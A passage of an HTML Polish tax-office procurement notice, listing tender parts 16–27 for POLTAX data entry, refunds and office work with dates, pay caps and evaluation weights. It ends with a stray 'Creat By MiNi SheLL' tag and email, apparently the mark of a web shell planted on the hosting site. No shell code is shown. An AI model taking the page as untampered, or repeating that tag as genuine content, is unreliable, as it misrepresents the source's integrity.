Znajomość obsługi programu:  POLTAX. 
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych sześciu Wykonawców.
Termin realizacji zadania od 15 marca 2015r. do 15 maja 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Wprowadzanie danych do bazy POLTAX (PIT -37 wraz z załącznikami).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do bazy POLTAX (PIT -37 wraz z załącznikami) 3200 szt. deklaracji.
Zamawiający będzie wskazywał deklaracje priorytetowe, do wprowadzenia w pierwszej kolejności. 
Czynności do wykonania w zadaniu:
 wprowadzanie danych zawartych w zeznaniach rocznych;
 zatwierdzanie deklaracji ze statusem prawidłowy;
 wyłączenie z paczek zeznań z statusem błędne i przypisanie ich do nowych paczek ;
 obsługa dokumentów w systemach informatycznych: POLTAX;
 przekazanie zatwierdzonych paczek do Kierownika komórki lub wyznaczonego pracownika w celu wykonania rejestrów przypisów/odpisów.
Znajomość obsługi programu:  POLTAX. 
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych sześciu Wykonawców.
Termin realizacji zadania od 15 marca 2015r. do 15 maja 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Wprowadzanie danych do bazy POLTAX (PIT -37 wraz z załącznikami).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do bazy POLTAX (PIT -37 wraz z załącznikami) 3200 szt. deklaracji.
Zamawiający będzie wskazywał deklaracje priorytetowe, do wprowadzenia w pierwszej kolejności. 
Czynności do wykonania w zadaniu:
 wprowadzanie danych zawartych w zeznaniach rocznych;
 zatwierdzanie deklaracji ze statusem prawidłowy;
 wyłączenie z paczek zeznań z statusem błędne i przypisanie ich do nowych paczek ;
 obsługa dokumentów w systemach informatycznych: POLTAX;
 przekazanie zatwierdzonych paczek do Kierownika komórki lub wyznaczonego pracownika w celu wykonania rejestrów przypisów/odpisów.
Znajomość obsługi programu:  POLTAX. 
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych sześciu Wykonawców.
Termin realizacji zadania od 15 marca 2015r. do 15 maja 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Wprowadzanie danych do aplikacji POLTAX (PIT-11, PIT-8C).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmujące wprowadzanie danych do aplikacji POLTAX (PIT-11, PIT-8C) 4000 szt. deklaracji.
Czynności do wykonania w zadaniu:
 utworzenie paczki
 wstępna rejestracja i wprowadzanie danych szczegółowych do systemu POLTAX, sprawdzenie poprawności, zatwierdzenie dokumentu,
 przekazywanie paczek do archiwum urzędu,
Znajomość obsługi programu:  POLTAX.
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych sześciu Wykonawców.
Termin realizacji zadania od 15 stycznia 2015r. do 28 lutego 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Wprowadzanie danych do aplikacji POLTAX (PIT-11, PIT-8C).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmujące wprowadzanie danych do aplikacji POLTAX (PIT-11, PIT-8C) 4000 szt. deklaracji.
Czynności do wykonania w zadaniu:
 utworzenie paczki
 wstępna rejestracja i wprowadzanie danych szczegółowych do systemu POLTAX, sprawdzenie poprawności, zatwierdzenie dokumentu,
 przekazywanie paczek do archiwum urzędu,
Znajomość obsługi programu:  POLTAX.
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych sześciu Wykonawców.
Termin realizacji zadania od 15 stycznia 2015r. do 28 lutego 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Wprowadzanie danych do aplikacji POLTAX (PIT-11, PIT-8C).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmujące wprowadzanie danych do aplikacji POLTAX (PIT-11, PIT-8C) 4000 szt. deklaracji.
Czynności do wykonania w zadaniu:
 utworzenie paczki
 wstępna rejestracja i wprowadzanie danych szczegółowych do systemu POLTAX, sprawdzenie poprawności, zatwierdzenie dokumentu,
 przekazywanie paczek do archiwum urzędu,
Znajomość obsługi programu:  POLTAX.
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych sześciu Wykonawców.
Termin realizacji zadania od 15 stycznia 2015r. do 28 lutego 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Wprowadzanie danych do aplikacji POLTAX (PIT-11, PIT-8C).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmujące wprowadzanie danych do aplikacji POLTAX (PIT-11, PIT-8C) 4000 szt. deklaracji.
Czynności do wykonania w zadaniu:
 utworzenie paczki
 wstępna rejestracja i wprowadzanie danych szczegółowych do systemu POLTAX, sprawdzenie poprawności, zatwierdzenie dokumentu,
 przekazywanie paczek do archiwum urzędu,
Znajomość obsługi programu:  POLTAX.
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych sześciu Wykonawców.
Termin realizacji zadania od 15 stycznia 2015r. do 28 lutego 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Wprowadzanie danych do aplikacji POLTAX (PIT-11, PIT-8C).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmujące wprowadzanie danych do aplikacji POLTAX (PIT-11, PIT-8C) 4000 szt. deklaracji.
Czynności do wykonania w zadaniu:
 utworzenie paczki
 wstępna rejestracja i wprowadzanie danych szczegółowych do systemu POLTAX, sprawdzenie poprawności, zatwierdzenie dokumentu,
 przekazywanie paczek do archiwum urzędu,
Znajomość obsługi programu:  POLTAX.
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych sześciu Wykonawców.
Termin realizacji zadania od 15 stycznia 2015r. do 28 lutego 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Wprowadzanie danych do aplikacji POLTAX (PIT-11, PIT-8C).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmujące wprowadzanie danych do aplikacji POLTAX (PIT-11, PIT-8C) 4000 szt. deklaracji.
Czynności do wykonania w zadaniu:
 utworzenie paczki
 wstępna rejestracja i wprowadzanie danych szczegółowych do systemu POLTAX, sprawdzenie poprawności, zatwierdzenie dokumentu,
 przekazywanie paczek do archiwum urzędu,
Znajomość obsługi programu:  POLTAX.
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych sześciu Wykonawców.
Termin realizacji zadania od 15 stycznia 2015r. do 28 lutego 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Wprowadzanie danych do systemu komputerowego oraz usługi biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu komputerowego oraz usługi biurowe tj.:
 przygotowywanie korespondencji wychodzącej w aplikacji Biblioteka Akt oraz wykonywanie czynności nadawczych (20 poz. na h), 
 poszukiwanie i analiza informacji będących w posiadaniu urzędu nt posiadanego majątku zobowiązanych oraz poszukiwanie majątku w innych instytucjach (przygotowywanie zapytań) (5 podmiotów na h), 
 kompletowanie i archiwizacja akt (30 dokumentów na h) 
 wprowadzanie danych do systemu, w tym obsługa aplikacji POLTAX (35 nr systemowych na h) 
 odnotowywanie w systemie informacji o doręczeniu (70szt/h)  
 kompletowanie i przygotowywanie akt przesłanych do innych organów ( 40 dokumentów na h)
 kompletowanie akt bieżących (20 dokumentów na h)
Znajomość obsługi programu:  EGAPOLTAX, POLTAX,  BIBLIOTEKA  AKT.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybrany jeden Wykonawca.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 9,00 złotych brutto za jedną godzinę.
Na Wykonawcę zostało przewidziane 720 godzin.
Termin realizacji zadania od 09 lutego 2015r. do 17 czerwca 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 09.02.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Wprowadzanie danych do systemu komputerowego oraz usługi biurowe polegające na realizacji zajęć wierzytelności..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu komputerowego oraz usługi biurowe polegające na realizacji zajęć wierzytelności.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybrany jeden Wykonawca.
Znajomość obsługi programu:  POLTAX 2B, BIBLIOTEKA  AKT.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybrany jeden Wykonawca.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 9,00 złotych brutto za jedną godzinę.
Na Wykonawcę zostało przewidziane 1111 godzin.
Termin realizacji zadania od 19 stycznia 2015r. do 30 sierpnia 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 19.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Wprowadzanie danych do bazy POLTAX 2B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do bazy POLTAX 2B:
Czynności do wykonania w zadaniu:
 Księgowanie i dokonywanie zwrotów nadpłat z zeznań rocznych PIT-37 za 2014 rok, 
 Realizacja zajęć egzekucyjnych, komorniczych i innych w powyższym zakresie,
 Zaliczanie nadpłat na poczet zaległości podatkowych jak i bieżących i przyszłych zobowiązań podatkowych.
Łączna ilość zwrotów do zaksięgowania: 10.000 sztuk.
Znajomość obsługi programu:  POLTAX 2B, BIBLIOTEKA AKT.  
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybrany jeden Wykonawca. 
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 0,70 złotych brutto za jedną sztukę zwrotu nadpłaty.
Termin realizacji zadania od 02 lutego 2015r. do 30 lipca 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.02.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Wprowadzanie danych do systemu komputerowego oraz usługi biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu komputerowego oraz usługi biurowe polegające na: 
 Wprowadzaniu zajęć wierzytelności do systemu Biblioteka Akt ( ok.50 szt. na h ),
 Przekazywanie wprowadzanych dokumentów wraz z wydrukami do komórki RP I,
 Wysyłka błędnie przysłanych zajęć wierzytelności do innych urzędów. 
Znajomość obsługi programu:   BIBLIOTEKA  AKT.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybrany jeden Wykonawca. 
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 9,00 złotych brutto za jedną godzinę.
Na Wykonawcę zostało przewidziane 500 godzin.
Termin realizacji zadania od 02 lutego 2015r. do 30 kwietnia 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.02.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com